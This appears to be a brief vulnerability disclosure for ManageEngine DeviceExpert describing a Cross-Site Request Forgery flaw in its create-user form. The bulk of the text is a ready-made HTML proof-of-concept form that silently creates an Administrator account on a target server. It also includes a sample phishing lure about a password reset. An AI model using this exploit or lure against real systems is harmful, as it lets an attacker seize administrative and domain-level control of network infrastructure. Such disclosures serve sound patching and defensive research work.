. contents:: Table Of Content
DeviceExpert is a web–based, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, DeviceExpert helps automate and take total control of the entire life cycle of device configuration management.
Create user form
This Cross-Site Request Forgery vulnerability enables an anonymous attacker to add an admin account into the application. This leads to compromising the whole domain as the application normally uses privileged domain account to perform administration tasks.
Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)
For Example :- Device password has been changed click here to reset
####################CSRF COde#######################
<html>
<body>
<form action="https://Server-IP:6060/STATE_ID/1423516534014/CreateUser.ve" method="POST">
<input type="hidden" name="loginName" value="hackerkaustubh" />
<input type="hidden" name="password" value="kaustubh" />
<input type="hidden" name="confirmpass" value="kaustubh" />
<input type="hidden" name="emailaddress" value="[email protected]" />
<input type="hidden" name="SEND_EMAIL" value="true" />
<input type="hidden" name="roles" value="Administrator" />
<input type="hidden" name="ComponentSelection" value="SpecificDevice" />
<input type="hidden" name="searchfield" value="--Search Devices--" />
<input type="hidden" name="DEVICEGROUPSELECTION" value="1" />
<input type="hidden" name="DeviceGroupDescription"/> value="This device group contains all the devices present in the inventory" />
<input type="hidden" name="QUERYID" value="-1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Receved from manage engine team
Open DeviceExper.zip